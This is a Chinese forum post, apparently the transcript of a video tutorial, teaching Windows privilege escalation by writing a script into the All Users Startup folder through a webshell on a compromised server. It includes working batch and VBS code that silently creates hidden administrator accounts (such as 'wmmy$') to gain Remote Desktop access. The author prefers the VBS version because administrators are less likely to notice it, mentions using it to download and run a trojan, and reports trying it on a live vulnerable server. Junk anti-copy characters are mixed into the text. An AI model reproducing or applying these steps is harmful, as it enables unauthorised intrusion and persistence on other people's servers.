- 帖子
- 575
- 积分
- 1897
- 威望
- 2479
- 金钱
- 15914
- 在线时间
- 175 小时
|
大家好,我是完美蚂蚁 今天给大家带来的提权教程是7 l) u3 o4 Q' N4 ~ d
启动 提权2 B6 ~, Q# z; e3 t7 R3 ^; R6 W+ p
C:\Docume~1\All Users\「开始」菜单\程序\启动
" T: G' v4 Q* M在这里必须有写入权限 否则此方法无效: H+ l1 V' U3 I0 M' T5 x \
因为我是在网吧 这里显示不了路径
/ j0 C2 I5 Q3 q9 `# @9 b q/ |! l我去服务器上演示给大家看
) w9 z* ?' O/ H$ |. o8 e大家看到了把 就是这个路径 在这个里面写入文件 等候服务器从起 就会自动执行我们的* l0 g; m; U9 E @6 h" o- m* M7 b
文件 从而运行我们的文件
% k5 w( {3 r1 |) v/ n2 K. q4 m这里有两中方式 第一种是批处理
, E1 g0 d0 E6 D" b9 E我们来看下目前 我机器上的用户组
+ ]7 H5 `, m0 l# j0 n* C8 Y: H- V目前我们没有521这个用户
7 e- b) ^; |8 E# Q- _) c# F看到了把 已经添加到管理组中去了 刚才我们运行程序的时候 一闪而过一个黑色提示
+ B7 y) [; e) n' j" p$ ^大家看到了吧 如果是在服务器上运行 一样会有这个提示的 细心的管理员有可能发现/ @/ ]- B: p7 S% N4 P d+ c; B
下面我们来介绍第二中方法使用VBS脚本 大家都知道VBS脚本是没有这个提示的2 b5 ]6 O) [. z5 u! A# i( ]; a
大家看 已经成功加入了WMMY用户
3 j5 q l. E6 P: E; d( b网络实战才是我们练手的目的 我已经找到一个含有这种漏洞的WBESHELL了$ I `; ~5 @1 r+ a7 n! G- ]9 k( S
当前终端服务端口: 3389
+ {7 z6 L$ b! X* S系统自动登录功能未开启
3 G3 p- I& P5 A9 f% g/ U3389 已经打开了 我们只需要拥有一个管理员权限的用户就可以了
' q! O1 @$ _$ |! `8 I. R8 MC:\Docume~1\All Users\「开始」菜单\程序\启动 这个是默认的路径
$ G/ x, K0 }5 Y第一种隐蔽性太差 我们就用第二种吧
7 _! u+ r: Z& d Y! @已经写入了 我们只需要等待服务器从起 那个VBS脚本文件就会把我们的用户加入进去$ u2 f7 m# y8 P0 @' O- R8 I8 |
从而取得了3389的登陆权限
* n2 t! o6 A) [ `( N9 u其实在VBS脚本中 我们不一定需要添加管理员帐户可以 直接让VBS下载运行我们的木马
w9 w7 K( L2 C! b7 j8 r基本原理都差不多 我就不多介绍了( a/ e4 L( t4 F2 y
教程结束```
4 @# \& {3 y7 x F& r4 K1 N+ u2 U@echo off; f, {8 V7 G9 y& x. |
net user 521 521 /add
8 [3 S* ^" [& R2 rnet localgroup administrators 521 /add
5 W) d8 i+ T m- A
6 c. u" O2 A0 V6 l7 zon Error Resume next8 d% w9 v2 q8 F) |4 q# M8 R
set wshshell=createobject("wscript.shell")
3 G8 k' q" x. j. oa=wshshell.run("net user wmmy$ 1227 /add",0)7 E* I o d# Y" T( ]
a=wshshell.run("net localgroup administrators wmmy$ /add",0)
, j0 j8 z8 P2 d
) u5 p* { U+ p
+ t* s" ]1 Q7 s9 q' m点击下载9 r7 g/ @3 ~' \0 H% E1 X
|
-
2
评分人数
-
|